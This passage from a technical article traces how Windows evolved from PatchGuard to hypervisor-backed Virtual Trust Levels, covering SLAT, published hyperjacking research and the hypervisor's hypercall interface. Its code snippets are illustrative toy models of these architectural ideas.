Note: The Robin and Irvine enumeration includes instructions like SGDT (store global descriptor table register), SIDT (store interrupt descriptor table register), SLDT (store local descriptor table register), SMSW (store machine status word), and PUSHF/POPF (push/pop flags including IOPL). Each of these silently returned or accepted privileged state from user mode without raising a fault. The aggregate effect was that no classical Popek-Goldberg VMM could correctly virtualize an unmodified x86 guest -- every one of those seventeen instructions was a hole the VMM could not see through.
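The Popek-Goldberg condition is, at bottom, a set-inclusion test, and a toy model makes that concrete. The sketch below is illustrative only: the instruction sets are a small hand-picked subset (the unprivileged instructions named above plus a few that do trap), not the full Robin and Irvine enumeration, and the function names are hypothetical.

```python
# Toy model of the Popek-Goldberg sufficient condition: an ISA is
# classically virtualizable if every sensitive instruction is privileged
# (that is, traps when executed in user mode).

def unprivileged_sensitive(sensitive, privileged):
    """Return the sensitive instructions that do NOT trap in user mode."""
    return set(sensitive) - set(privileged)


def is_classically_virtualizable(sensitive, privileged):
    """True when the set of sensitive instructions is a subset of the privileged set."""
    return not unprivileged_sensitive(sensitive, privileged)


# Illustrative subset only, not the full list of seventeen.
# LGDT and MOV to CR3 are sensitive and do fault in user mode;
# the other six are sensitive but execute silently.
IA32_SENSITIVE = {"SGDT", "SIDT", "SLDT", "SMSW", "PUSHF", "POPF", "LGDT", "MOV_CR3"}
IA32_PRIVILEGED = {"LGDT", "MOV_CR3", "HLT"}

holes = unprivileged_sensitive(IA32_SENSITIVE, IA32_PRIVILEGED)
print("holes the VMM cannot see:", sorted(holes))
print("classically virtualizable:", is_classically_virtualizable(IA32_SENSITIVE, IA32_PRIVILEGED))
```

Each entry in `holes` is an instruction a trap-and-emulate VMM never gets to observe, which is why binary translation or hardware extensions were needed.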

Intel and AMD ended the problem in hardware. Intel VT-x (codename Vanderpool, November 2005) and AMD-V (codename Pacifica, May 2006) added a new CPU mode -- VMX root operation for Intel, SVM host mode for AMD -- and a new instruction-emulation mechanism. A VM exit could be configured to fire on every sensitive instruction the hypervisor wished to intercept, transferring control to the host with a structured exit reason and an opaque, host-controlled snapshot of guest state. After 2006, x86-64 became Popek-Goldberg-virtualizable in hardware [@wp-x86-virtualization].

sequenceDiagram
    participant Guest as Guest OS (VMX non-root)
    participant CPU as CPU hardware
    participant HV as Hypervisor (VMX root)
    Guest->>CPU: MOV CR3, rax (sensitive instr)
    CPU->>HV: VM-EXIT (reason 28: CR access)
    HV->>HV: Read VMCS exit-qualification
    HV->>HV: Validate, emulate, update SLAT
    HV->>CPU: VMRESUME
    CPU->>Guest: Continue guest at next instruction
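The exit-and-resume sequence in the diagram can be sketched as a small dispatch routine. This is a toy model, not the Microsoft hypervisor's logic: the class names, the `guest_owned_roots` validation policy, and the handler signature are all assumptions made for illustration. The only details taken from the diagram are the exit reason (28, control-register access) and the validate, emulate, resume ordering.

```python
from dataclasses import dataclass, field

EXIT_REASON_CR_ACCESS = 28  # exit reason shown in the diagram


@dataclass
class GuestState:
    """Hypothetical snapshot of the guest registers the handler needs."""
    rip: int
    rax: int
    cr3: int = 0


@dataclass
class ToyHypervisor:
    # Hypothetical policy: page-table roots this guest is allowed to load.
    guest_owned_roots: set = field(default_factory=set)
    exits_handled: int = 0

    def handle_vm_exit(self, reason: int, guest: GuestState, instr_len: int) -> None:
        self.exits_handled += 1
        if reason != EXIT_REASON_CR_ACCESS:
            raise NotImplementedError(f"unhandled exit reason {reason}")
        # Validate: the guest may only switch to a root it owns.
        if guest.rax not in self.guest_owned_roots:
            raise PermissionError("guest tried to load a page-table root it does not own")
        # Emulate the effect of MOV CR3, rax on the virtual CPU.
        guest.cr3 = guest.rax
        # Resume at the next instruction by skipping the trapped one.
        guest.rip += instr_len


hv = ToyHypervisor(guest_owned_roots={0x5000})
guest = GuestState(rip=0x1000, rax=0x5000)
# MOV CR3, rax encodes as 0F 22 D8, so the instruction is 3 bytes long.
hv.handle_vm_exit(EXIT_REASON_CR_ACCESS, guest, instr_len=3)
print(hex(guest.cr3), hex(guest.rip))
```

The point of the sketch is the control flow: the guest never touches the real CR3, and the hypervisor decides whether the requested change happens at all.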

One architectural element more was needed before any of this could be a security primitive rather than just a virtualization primitive. Classical x86 paging maps a guest virtual address to a physical address through a single CPU-walked page table. In a virtualized system that single table cannot be enough, because the guest needs its own virtual-to-physical map and the host needs to remap the guest's "physical" address to a real machine-physical address. The first generations of VT-x simulated this two-level mapping in software through shadow page tables, which the hypervisor had to maintain alongside the guest's tables on every page-table edit. Shadow paging was correct but slow, and it gave the hypervisor no clean way to enforce a different memory map for different parts of the same guest.

Second-Level Address Translation (SLAT) -- Intel's Extended Page Tables (EPT, shipped with Nehalem in November 2008) and AMD's Nested Page Tables (NPT, shipped with the Barcelona-generation Opteron on September 10, 2007) -- solved both problems in hardware. The guest walks its own page table from virtual to "guest physical"; the CPU then walks a second, hypervisor-owned page table from "guest physical" to "system physical." Two key properties follow. First, the hypervisor has exclusive control of the second-level mapping; the guest cannot read, write, or even know that it exists. Second, because the second-level mapping is per-partition, the hypervisor can give two partitions different views of the same machine physical memory -- the same page can be readable in one partition and entirely absent in another.

Second-Level Address Translation (SLAT): A hardware feature on Intel (EPT) and AMD (NPT) CPUs that lets the hypervisor maintain a second page table mapping guest-physical addresses to system-physical addresses. The CPU walks the guest's own page table for the virtual-to-guest-physical mapping, then walks the hypervisor's table for the guest-physical-to-system-physical mapping. Because the second table is hypervisor-controlled and per-partition, the hypervisor can give different partitions -- and, in VBS, different Virtual Trust Levels inside the same partition -- different views of physical memory. SLAT is the bedrock of VTL memory protection [@ms-tlfs-pdf].
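A minimal sketch of the two-stage walk may help. It assumes single-level, dictionary-based page tables and 4 KiB pages, which real hardware does not use (the real structures are multi-level radix trees), and the `Partition` and `translate` names are hypothetical.

```python
PAGE_SIZE = 4096


class Partition:
    def __init__(self, name, guest_page_table, slat):
        self.name = name
        # Guest-owned: virtual page number -> guest-physical page number.
        self.guest_page_table = guest_page_table
        # Hypervisor-owned: guest-physical page number -> system-physical page number.
        self.slat = slat


def translate(partition, virtual_address):
    """Walk the guest table, then the hypervisor's SLAT table."""
    vpn, offset = divmod(virtual_address, PAGE_SIZE)
    gpn = partition.guest_page_table.get(vpn)
    if gpn is None:
        raise LookupError("guest page fault (handled by the guest OS)")
    spn = partition.slat.get(gpn)
    if spn is None:
        raise PermissionError("SLAT violation (control transfers to the hypervisor)")
    return spn * PAGE_SIZE + offset


# Both partitions use the same guest mapping, but only A's SLAT
# contains guest-physical page 5, so only A can reach system page 100.
part_a = Partition("A", guest_page_table={2: 5}, slat={5: 100})
part_b = Partition("B", guest_page_table={2: 5}, slat={7: 200})

print(hex(translate(part_a, 0x2010)))
```

Partition B can edit its own `guest_page_table` however it likes; without an entry in its `slat`, system page 100 stays unreachable, which is the second property described above.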

Hyper-V required VT-x or AMD-V at install time from day one. SLAT became mandatory with Windows Server 2016 and Windows 10 1607 [@ms-hyperv-architecture].

Popek and Goldberg gave us the property. Intel and AMD gave us the hardware. Microsoft used both to build a server hypervisor in 2008. But for the first seven years of Hyper-V's life, none of that machinery protected Windows from itself. Microsoft hadn't yet noticed the architectural problem that made it necessary -- or rather, they had noticed the problem (PatchGuard's bypass record was public) and had not yet conceded that the problem was structural. The concession came in 2015. What forced it was the same-privilege paradox.

4. The Same-Privilege Paradox -- Why PatchGuard Was Never Enough

PatchGuard, which Microsoft shipped in 2005 with Windows Server 2003 SP1 x64, ran inside ntoskrnl.exe at Ring 0 and scanned a curated list of kernel structures -- the system service dispatch table, the interrupt descriptor table, the kernel image's .text section -- at randomized intervals to detect tampering [@wp-kpp]. Within months, Skywing's Uninformed writeups showed how to bypass it. Microsoft kept shipping it. Researchers kept bypassing it. The pattern lasted a decade. The reason is not that PatchGuard's authors were sloppy. The reason is structural, and naming it correctly is the first of the three insights this article is built around.

Key idea: Any defense reachable by mov from Ring 0 is defeasible by mov from Ring 0.

The intuition is simple. PatchGuard is a piece of code. It lives in the kernel's virtual address space at some page. It owns a timer that re-runs it periodically. It maintains a randomization seed for which structures it checks next. It has a callback path into KeBugCheckEx if it detects tampering. Every one of those four assets -- the code page, the timer callback, the randomization seed, the bug-check path -- is a kernel data structure or a kernel virtual address. An attacker with Ring-0 code execution can locate each of them by searching the same kernel address space PatchGuard searches. They can patch the callback so the timer no-ops. They can patch the seed so the randomization is predictable. They can patch the bug-check path so it reports success. They can do all of this with a sequence of plain mov instructions. PatchGuard cannot defend against this, because PatchGuard's defenses live in the same place its attacker's writes do.

PatchGuard and its attacker are colleagues, not adversaries. They share an office. The office is `ntoskrnl.exe`'s virtual address space, and there is no key on the door.

This is the same-privilege paradox. It is not an implementation bug. It does not yield to better obfuscation, more randomization, or harder-to-find timers. It is an architectural ceiling. A defense at privilege level $P$ cannot be enforced against an attacker who also runs at privilege level $P$, because the defender's state lives in the attacker's address space. The defender can be made expensive to find; it cannot be made impossible to find, because the attacker has the same instructions, the same address-space view, and the same MMU privileges as the defender.

Note: The same-privilege paradox is a property of where the defense lives, not of how clever the defense is. PatchGuard's authors did add randomization. They did add multiple decoy callbacks. They did add cryptographically derived integrity checks. None of those reductions changes the basic fact that the attacker, holding the same Ring-0 privilege, can locate and edit each of them. The architectural fix is not better PatchGuard. The architectural fix is moving the defender to a privilege level the attacker cannot reach.
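The paradox can be shown with a toy model in which every piece of defender state carries the minimum privilege level needed to write it. Everything here is hypothetical (the two-level privilege ordering, the `ToyMachine` class, and the state names); it models where the defense lives, not how PatchGuard or HVCI are implemented.

```python
# Hypothetical privilege ordering: a larger number is more privileged.
KERNEL, HYPERVISOR = 0, 1


class ToyMachine:
    def __init__(self):
        self.state = {}
        self.write_level = {}

    def place(self, name, value, write_level):
        """Store defender state and record the privilege needed to change it."""
        self.state[name] = value
        self.write_level[name] = write_level

    def write(self, name, value, actor_level):
        if actor_level < self.write_level[name]:
            raise PermissionError(f"{name} is not writable at this privilege level")
        self.state[name] = value


m = ToyMachine()
# A defense that lives at the attacker's own privilege level.
m.place("patchguard_timer_armed", True, write_level=KERNEL)
# A defense whose state lives one level above the attacker.
m.place("hvci_policy_enabled", True, write_level=HYPERVISOR)

# The Ring-0 attacker disables the same-level defense with a plain write.
m.write("patchguard_timer_armed", False, actor_level=KERNEL)

# The same write against the higher-level defense is refused.
try:
    m.write("hvci_policy_enabled", False, actor_level=KERNEL)
    blocked = False
except PermissionError:
    blocked = True

print(m.state, blocked)
```

No amount of hiding changes the first outcome, because the check in `write` passes for any actor at the defender's level. Only raising `write_level` above the attacker changes it.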

Once the paradox is named, the defender's choice is binary. Either give up on having a defense at all -- treat Ring 0 as a free-fire zone where any malware that gets there has won -- or move the defender to a privilege level above Ring 0, at a hardware boundary the attacker's mov instructions cannot cross. Microsoft picked the second. It is the only architecturally honest choice.

To make it work, Microsoft needed three things. The first was a hypervisor already deployed on every Windows install. They had that since 2008. The second was a way to put a piece of Windows itself -- code, data, secrets -- inside the hypervisor's protection without spawning a separate VM, because spawning a separate VM doubles the system's resource cost and forces every Windows process to choose between living on the normal side or the secure side. That required an architectural idea that did not yet exist in 2010: a way to split a single partition into two privilege levels, each with its own SLAT mapping and its own register state. The third was a way to ensure the hypervisor itself could not be silently replaced or rolled back beneath the OS. That required a hardware-rooted measurement -- a DRTM event -- that the OS could attest to.

The architectural idea is the subject of section 6. The DRTM measurement is the subject of section 11. Both of them required a decade-long conversation about whether the hypervisor itself could be trusted at all -- a conversation that ran in parallel during the same years and that briefly seemed to argue the opposite case. We turn to that conversation next.

5. The Hyperjacking Era -- SubVirt, Blue Pill, and CloudBurst

While Microsoft was finishing Hyper-V, the security community was establishing that a hypervisor was not just a defense -- it was also the most powerful possible attacker against the OS sitting above it. Three demonstrations in three years made the point unmistakable.

SubVirt. In May 2006, Samuel King and Peter Chen at the University of Michigan, joined by Yi-Min Wang, Chad Verbowski, Helen Wang, and Jacob Lorch at Microsoft Research, presented "SubVirt: Implementing Malware with Virtual Machines" at IEEE S&P [@king-subvirt-2006]. Their construction was a Virtual Machine Based Rootkit (VMBR). A privileged installer running inside a legitimate OS installed a malicious VMM at boot time; on the next reboot, the malicious VMM ran first, brought up the original OS as a guest above it, and gained the privileged position of seeing every CPU instruction, every memory access, and every I/O the OS performed. The original OS had no architectural way to tell it was no longer the most-privileged software on the box. SubVirt was demonstrated against Windows XP (using Microsoft Virtual PC as the malicious VMM substrate) and against Linux (using VMware Workstation), specifically to show that the technique was not tied to any one operating system or any one hypervisor product.

Blue Pill. Three months later, at Black Hat USA 2006, Joanna Rutkowska of COSEINC demonstrated "Subverting Vista Kernel for Fun and Profit" [@wp-blue-pill]. Her tool, codenamed Blue Pill, took a step beyond SubVirt by doing the VMM insertion at runtime rather than at boot. The technique: a Ring-0 driver, running inside an already-booted Windows install on an AMD-V capable host, executed VMRUN against an attacker-controlled Virtual Machine Control Block (VMCB) whose initial state matched the current physical CPU. The CPU dropped out of SVM host mode and re-entered as a guest under the attacker's VMM. The OS continued running normally, with no boot-loader modification and no reboot.

In 2007, Rutkowska and Alexander Tereshkin returned to Black Hat USA with the more polished "IsGameOver(), Anyone?" presentation, refining the technique and addressing the early critics' detection ideas [@wp-blue-pill].

Note: Rutkowska's marketing claim that Blue Pill was "100% undetectable" attracted a public counter-effort: in 2007, Edgar Barbosa, Nate Lawson, Peter Ferrie, and Tom Ptacek all proposed detection techniques relying on side channels (timing artifacts of trapped instructions, TSC skew, structural differences in how RDTSC behaves under VT-x). The claim softened in subsequent publications, but the underlying point survived: a hostile thin hypervisor below a victim OS can be made arbitrarily difficult to detect from inside that OS, and the only architecturally clean way to know what you are running under is to measure the boot chain before the OS starts.

CloudBurst. At Black Hat USA 2009, Kostya Kortchinsky of Immunity Inc. presented CLOUDBURST. It was the first publicly demonstrated arbitrary-code-execution guest-to-host escape against a commercial hypervisor: a heap overflow in VMware's emulated SVGA-II graphics adapter, tracked as CVE-2009-1244 [@nvd-cve-2009-1244]. A guest VM, executing entirely inside a VMware-managed user-mode process on the host, could overflow a buffer in that process and gain host code execution. CloudBurst's lasting operational lesson was not the specific bug but the attack surface: device emulation -- not the trap-and-emulate core of the hypervisor -- is the largest piece of guest-attacker-controlled code in any commercial VMM. Every Hyper-V guest-to-host escape Microsoft has shipped a patch for since 2018 lands in either this device-emulation surface or the hypercall input-validation surface that mediates the same kinds of structured guest-controlled input.

flowchart TD
    subgraph Before["Before hyperjacking"]
        OS1["Victim OS"]
        FW1["Firmware (UEFI)"]
        HW1["Hardware"]
        OS1 --> FW1
        FW1 --> HW1
    end
    subgraph After["After hyperjacking"]
        OS2["Victim OS (now a guest)"]
        VMM["Hostile VMM (SubVirt / Blue Pill)"]
        FW2["Firmware (UEFI)"]
        HW2["Hardware"]
        OS2 --> VMM
        VMM --> FW2
        FW2 --> HW2
    end

The three demonstrations established a difficult dual truth. The hypervisor is the most powerful defender against an OS-level attacker, and it is the most powerful attacker against an OS-level defender. The same primitive can play either role; which role it plays in any given system depends only on whose hypervisor it is and whether the OS above it can prove that. SubVirt-style attacks did not require Microsoft to invent anything new -- they only had to be a possibility -- to force Microsoft into a design constraint: any "hypervisor as security primitive" architecture has to start by being the only hypervisor on the box, with a measurement of the hypervisor binary recorded in a TPM platform configuration register so that any malicious VMBR underneath could be detected at attestation time. This is the role that System Guard Secure Launch (DRTM) plays in the architecture, and we will return to it in section 11.
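The measurement idea can be sketched with the standard TPM extend operation, in which a register's new value is the hash of its old value concatenated with the digest of the thing being measured. The sketch below assumes a SHA-256 bank and a register that starts at all zeros; the image byte strings are placeholders, and the real Secure Launch flow (which registers are used, what exactly is measured, how the event log is verified) is not modeled here.

```python
import hashlib


def measure(blob: bytes) -> bytes:
    """Digest of the component being loaded."""
    return hashlib.sha256(blob).digest()


def extend(pcr: bytes, measurement: bytes) -> bytes:
    """TPM-style extend: new PCR = SHA-256(old PCR || measurement)."""
    return hashlib.sha256(pcr + measurement).digest()


# Assumption: the register starts at 32 zero bytes.
initial_pcr = bytes(32)

# Placeholder byte strings standing in for real binaries.
expected = extend(initial_pcr, measure(b"expected hypervisor image"))
hijacked = extend(initial_pcr, measure(b"hostile VMM image"))

print(expected.hex())
print(hijacked.hex())
print("attestation would match:", expected == hijacked)
```

Because extend is one-way and order-dependent, code that loads later cannot rewrite the register to the value a clean boot would have produced, which is what lets a verifier notice an unexpected hypervisor underneath the OS.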

Blue Pill (offense) and VBS (defense) are architecturally identical. Each is a thin Type-1 hypervisor that interposes between firmware and OS. Each owns the CPU's virtualization mode, the second-level page tables, and the IOMMU. Each is invisible to the OS unless the OS can prove what is underneath it. The only differences between them are whose hypervisor it is, whether it was measured at load time, and what it does with its privilege. The defense is the offense, run by the right people, in the right order, and attested to.

By 2010 the security community had agreed: the hypervisor is the most powerful primitive in the system, and whoever owns the SLAT page tables owns the box. Joanna Rutkowska's Invisible Things Lab launched Qubes OS, an explicitly hypervisor-rooted security OS, on April 7, 2010 [@qubes-introducing-2010]. Microsoft owned the SLAT page tables. They had a hypervisor on every Windows install. They had a server-consolidation product. What they did not yet have was a reason to re-purpose any of it for security. The reason was already being filed at the United States Patent and Trademark Office. The priority date was September 17, 2013.

6. The Pivot -- VSM, VTLs, and the Hepkin-Kishan Patent

On September 17, 2013, David Hepkin and Arun Kishan filed United States patent application 14/186,415, which would issue on August 30, 2016 as US Patent 9,430,642 B2 [@us9430642b2-patent]. The patent's title, "Providing virtual secure mode with different virtual trust levels," reads like marketing now because the words it introduced -- "Virtual Trust Level," "VTL," "Virtual Secure Mode" -- became Microsoft's own canonical terminology. In 2013 the words did not exist. The patent describes, in 2013, exactly what Microsoft shipped twenty-two months later in Windows 10 build 10240 [@ms-tlfs-vsm].

The patent's claim language is unusually specific. It teaches a virtual-machine manager that makes "multiple different virtual trust levels available to virtual processors of a virtual machine"; it teaches that "different memory access protections (such as the ability to read, write, and/or execute memory) can be associated with different portions of memory (e.g., memory pages) for each virtual trust level"; and it teaches that "the virtual trust levels are organized as a hierarchy with a higher level virtual trust level being more privileged than a lower virtual trust level." Each of those phrases is now a feature of the shipping Microsoft hypervisor.

Virtual Trust Level (VTL): A hypervisor-managed privilege level inside a single partition. Each VTL has its own SLAT mapping (so the same machine page can be readable in one VTL and absent in another), its own virtual-processor register state (so a VTL transition is a context switch, not a procedure call), and its own interrupt subsystem (so interrupts targeted at one VTL do not preempt code running in another). VTLs are hierarchical: a higher VTL can read all of a lower VTL's memory, but not vice versa. The shipping Microsoft hypervisor implements two VTLs (VTL0 = Normal world, VTL1 = Secure world); the architecture admits up to sixteen [@ms-tlfs-vsm].

Windows 10, which reached RTM on July 29, 2015, and Windows Server 2016 both shipped VBS atop the existing Hyper-V hypervisor [@wp-windows-10]. The architectural innovation -- the thing the patent was for -- was that VTL0 (Normal world, containing the NT kernel, user mode, and LSASS) and VTL1 (Secure world, containing the Secure Kernel and Isolated User Mode trustlets) ran inside the same partition rather than in two separate partitions. VBS is not a second VM. It is a per-VTL SLAT split inside the root partition, plus a per-VTL register-state snapshot, plus a per-VTL interrupt delivery surface. The hypervisor switches SLAT contexts on VTL transitions, exactly as it would switch SLAT contexts on a partition switch -- but the switch happens inside a single partition's address space, so there is no extra VM scheduling and no extra OS image to manage.

flowchart TD
    subgraph Root["Root partition"]
        subgraph VTL0["VTL0 -- Normal world"]
            NT["NT kernel (ntoskrnl.exe)"]
            User["User mode (lsass.exe, applications)"]
        end
        subgraph VTL1["VTL1 -- Secure world"]
            SK["Secure Kernel (securekernel.exe)"]
            IUM["Isolated User Mode trustlets"]
            LSAISO["LSAISO.EXE"]
            VTPM["vTPM trustlet"]
            IUM --- LSAISO
            IUM --- VTPM
        end
    end
    HV["Microsoft Hypervisor (hvix64 / hvax64)"]
    HW["Hardware (CPU, RAM, IOMMU, TPM)"]
    VTL0 -. "Secure call (hypercall + SynIC)" .-> VTL1
    VTL1 --> HV
    VTL0 --> HV
    HV --> HW

The Hyper-V Top-Level Functional Specification, chapter 15, names the architectural facts verbatim. "VSM achieves and maintains isolation through Virtual Trust Levels (VTLs). VTLs are enabled and managed on both a per-partition and per-virtual processor basis." "Virtual Trust Levels are hierarchical, with higher levels being more privileged than lower levels." "Architecturally, up to 16 levels of VTLs are supported; however a hypervisor may choose to implement fewer than 16 VTL's. Currently, only two VTLs are implemented." The C-level definition #define HV_NUM_VTLS 2 is published in the same specification [@ms-tlfs-vsm]. Two VTLs are what ships; the architecture has room for more.
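The per-VTL memory view can be sketched as one permission table per VTL inside a single partition. This is a toy model under stated assumptions: pages are named strings, permissions are sets of `r`, `w`, `x`, and the `ToyVsmPartition` class and its methods are hypothetical rather than TLFS hypercalls. Only `HV_NUM_VTLS = 2` and the hierarchy rule (a higher VTL can read a lower VTL's memory, not the reverse) come from the specification text quoted above.

```python
HV_NUM_VTLS = 2  # matches the definition quoted from the specification


class ToyVsmPartition:
    def __init__(self):
        # One permission table per VTL: page name -> set of allowed access kinds.
        self.slat = [dict() for _ in range(HV_NUM_VTLS)]

    def map_page(self, page, owner_vtl, perms):
        """Map a page for its owner VTL; higher VTLs get read access, lower VTLs get nothing."""
        for vtl in range(owner_vtl, HV_NUM_VTLS):
            self.slat[vtl][page] = set(perms) if vtl == owner_vtl else {"r"}

    def restrict(self, requester_vtl, page, target_vtl, perms):
        """Only a strictly higher VTL may change a lower VTL's view of a page."""
        if requester_vtl <= target_vtl:
            raise PermissionError("a VTL cannot change protections at its own level or above")
        self.slat[target_vtl][page] = set(perms)

    def access(self, vtl, page, kind):
        return kind in self.slat[vtl].get(page, set())


p = ToyVsmPartition()
p.map_page("credential_secret", owner_vtl=1, perms="rw")  # absent from VTL0's view
p.map_page("driver_code", owner_vtl=0, perms="rwx")
# The secure world removes write access from the normal world's view of the code page.
p.restrict(requester_vtl=1, page="driver_code", target_vtl=0, perms="rx")

print(p.access(0, "credential_secret", "r"))  # VTL0 cannot see the secret
print(p.access(0, "driver_code", "w"))        # VTL0 can no longer patch the code page
```

The `restrict` check is the same-privilege argument in code form: VTL0 cannot undo a restriction on itself because the table that records it is only editable from above.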

VSM enables operating system software in the root and guest partitions to create isolated regions of memory for storage and processing of system security assets. Access to these isolated regions is controlled and granted solely through the hypervisor, which is a highly privileged, highly trusted part of the system's Trusted Compute Base (TCB). -- Microsoft, *Hyper-V Top-Level Functional Specification*, chapter 15 [@ms-tlfs-vsm]

This is the second insight the article is built around: VBS is not a re-architecture. It is a re-purposing. The hypervisor was already on every Windows install for unrelated reasons. The 2015 pivot did not require new hardware, new VMs, or new CPUs. It required a new way to organize what was already there -- two SLAT mappings instead of one, two register snapshots instead of one, a secure-call ABI on top of the SynIC -- and a Windows-side Secure Kernel binary to run inside the new VTL1 view. The patent gave the design its formal expression; the engineering had been waiting since 2008 for the right architectural insight.

Note: David Hepkin spent over a decade on the NT kernel architecture team before the VSM design; Arun Kishan was an NT kernel architect and is now Microsoft's Corporate Vice President for the Operating Systems Platform group. Neither is a virtualization specialist by background. Their patent is, in retrospect, a kernel-team idea about how to put a piece of the kernel itself behind a hardware boundary the kernel cannot cross -- exactly the kind of design that an architect who had lived inside ntoskrnl.exe for years would invent.

Alex Ionescu's Black Hat USA 2015 deck "Battle of SKM and IUM: How Windows 10 Rewrites OS Architecture" reverse-engineered the entire VSM stack within four weeks of Windows 10 RTM [@ionescu-bh-2015]. The vocabulary Ionescu introduced has become the canonical research language for talking about VBS: VTL as "synthetic ring level managed by the hypervisor"; trustlets for the user-mode processes that run inside VTL1's Isolated User Mode; Signature Level 12 plus the IUM EKU 1.3.6.1.4.1.311.10.3.37 as the loader's signing requirement. Microsoft's own developer documentation now uses the same terms [@ms-iso-user-mode-trustlets].

The pivot, then, was not a sudden re-architecture. It was the cash-out of a deliberate multi-year engineering plan that began at least twenty-two months before Windows 10 RTM. To see what VBS actually enforces -- and which hypervisor primitive backs each piece of that enforcement -- we need to walk the hypervisor's public surface. There are five surfaces. They are the architectural body of the article.

7. Architecture Tour -- The Hypervisor's Public Surface

What does the Windows hypervisor actually look like as a piece of software? It is a small kernel, on the order of one to two hundred thousand lines of C and C++ by community estimate; Microsoft has not published a primary line count. It has five externally visible surfaces, all of which are documented in the Hyper-V Top-Level Functional Specification (TLFS) v6.0b [@ms-tlfs-pdf]. We walk them in turn.

7.1 Partitions, VMBus, and the VSP/VSC pair

A partition is the hypervisor's unit of isolation. From the Microsoft architecture page: "The Microsoft hypervisor must have at least one parent, or root, partition, running Windows. The virtualization management stack runs in the parent partition and has direct access to hardware devices. The root partition then creates the child partitions which host the guest operating systems" [@ms-hyperv-architecture]. The root partition is a full Windows install with privileged hypercalls and direct access to hardware; each child partition is a guest VM with only the hardware the root has chosen to expose.

A guest VM does I/O over the VMBus. A network packet, for example, travels from the guest application down to the guest's Windows NDIS stack; through the synthetic NIC miniport driver (the VSC) in the guest's kernel; over the VMBus message channel; into the network VSP in the root partition; into the root's real NDIS stack; into the physical NIC driver; out the wire. The hypervisor's role in this chain is structural: it owns the VMBus message channel, the SynIC interrupts that notify the VSP and VSC of new traffic, and the per-partition SLAT mappings that decide which bytes either side can read.

The architectural implication is that device emulation lives in the root partition, not in the hypervisor binary. The TCB the hypervisor binary itself has to protect is narrow. The TCB the root partition's drivers have to protect is much wider -- but those drivers live in normal Windows kernel mode, where Microsoft has thirty years of tooling. This is why almost every public Hyper-V CVE since 2018 has landed in vmswitch.sys, storvsp.sys, or the NT Kernel Integration VSP, rather than in hvix64.exe itself.

Note: Putting device emulation in the root partition means the hypervisor binary does not need to parse Ethernet frames, SCSI commands, USB descriptors, or graphics-adapter command rings. The trade-off is that the root partition becomes part of the TCB -- a root-partition kernel-mode bug is a hypervisor-equivalent break -- but the small hypervisor binary itself can be reviewed, fuzzed, and reasoned about as a single piece of code.

7.2 The hypercall ABI

Hypercalls are how partitions request services from the hypervisor. The TLFS documents two flavors. A fast hypercall passes its parameters inline in CPU registers: on x64, rcx carries a 64-bit hypercall input value (the low 16 bits are the call code; the upper 48 bits are a control word with fields for the Fast flag, variable-header size, Rep Count, and Rep Start Index), rdx carries the first input parameter, and r8 carries the second. A slow hypercall instead passes the GPA (guest physical address) of an input-parameter page in rdx, and the GPA of an output-parameter page in r8; the actual parameter content lives in those pages. The instruction that triggers the hypercall is vmcall on Intel and vmmcall on AMD; the hypervisor maps both onto the same internal entry point [@ms-tlfs-pdf].

Hypercall: A guest-to-hypervisor call. The guest issues `vmcall` (Intel) or `vmmcall` (AMD); the CPU traps via VM-EXIT into the hypervisor in VMX root mode; the hypervisor reads the call code from `rcx`, reads the inputs from registers (fast) or from a GPA-pointed page (slow), services the request, writes outputs back, and returns via VM-ENTRY. Hypercalls are the only legitimate way for a partition to invoke hypervisor services [@ms-tlfs-pdf].

```javascript
// A JavaScript model of the rcx hypercall input value layout.
// In a real hypercall the guest sets rcx, rdx, r8 and issues vmcall / vmmcall.
function packHypercallInput({ callCode, fastFlag, varHeaderSize, isNested, repCount, repStartIdx }) {
  // rcx layout (TLFS section 3 "Hypercall Interface", verbatim bit map)
  //   bits 0..15   Call Code
  //   bit  16      Fast (1 = inline params in rdx/r8)
  //   bits 17..26  Variable header size (in QWORDs)
  //   bits 27..30  RsvdZ
  //   bit  31      Is Nested
  //   bits 32..43  Rep Count
  //   bits 44..47  RsvdZ
  //   bits 48..59  Rep Start Index
  //   bits 60..63  RsvdZ
  let rcx = 0n;
  rcx |= BigInt(callCode) & 0xFFFFn;
  if (fastFlag) rcx |= 1n << 16n;
  rcx |= (BigInt(varHeaderSize) & 0x3FFn) << 17n;
  if (isNested) rcx |= 1n << 31n;
  rcx |= (BigInt(repCount) & 0xFFFn) << 32n;
  rcx |= (BigInt(repStartIdx) & 0xFFFn) << 48n;
  return rcx;
}

// HvCallPostMessage = 0x005C, fast hypercall (TLFS section 11)
const rcx = packHypercallInput({
  callCode: 0x005C,
  fastFlag: 1,
  varHeaderSize: 0,
  isNested: 0,
  repCount: 0,
  repStartIdx: 0,
});
console.log('rcx = 0x' + rcx.toString(16).padStart(16, '0'));
// Output: rcx = 0x000000000001005c
```
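Decoding the same value is a useful sanity check when reading a trace. The sketch below splits a 64-bit hypercall input value back into the fields of the bit map described above. The function name `unpackHypercallInput` and the returned property names are illustrative choices, not TLFS identifiers.

```javascript
// Hypothetical helper: decode a 64-bit hypercall input value (the rcx contents)
// into its fields, following the bit layout described in the text above.
function unpackHypercallInput(value) {
  // Extract `width` bits starting at bit position `shift`.
  const bits = (shift, width) =>
    (value >> BigInt(shift)) & ((1n << BigInt(width)) - 1n);
  return {
    callCode: Number(bits(0, 16)),        // bits 0..15
    fast: bits(16, 1) === 1n,             // bit 16
    varHeaderSize: Number(bits(17, 10)),  // bits 17..26, in QWORDs
    isNested: bits(31, 1) === 1n,         // bit 31
    repCount: Number(bits(32, 12)),       // bits 32..43
    repStartIdx: Number(bits(48, 12)),    // bits 48..59
  };
}

// The value produced for a fast call with call code 0x005C.
const decoded = unpackHypercallInput(0x000000000001005cn);
console.log(decoded.callCode.toString(16), decoded.fast); // 5c true
```

The reserved (RsvdZ) ranges are deliberately not returned; a stricter decoder could reject any value with those bits set.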

The call-code space is small and well-documented: a few hundred codes, each one a structured request with typed inputs and outputs. The hypercall path is also where the most consequential 2024 Hyper-V CVE lived. CVE-2024-21407 was a use-after-free in hvix64.exe's handling of a specific file-operation hypercall, the rare case where the bug was in the hypervisor binary itself rather than in a root-partition driver [@nvd-cve-2024-21407].

7.3 Intercepts

Intercepts are how the hypervisor virtualizes guest behavior. The TLFS distinguishes four categories: instruction intercepts (CPUID, MSR reads/writes, I/O-port instructions), exception intercepts (page faults, general protection faults), memory-access intercepts (a guest tries to read or write a specific guest-physical-address region), and partition-state intercepts (a guest hits a state that the hypervisor wants to be notified about). Each is configured per-partition through the Intel VMCS execution-control bits or the AMD VMCB control fields [@ms-tlfs-pdf].

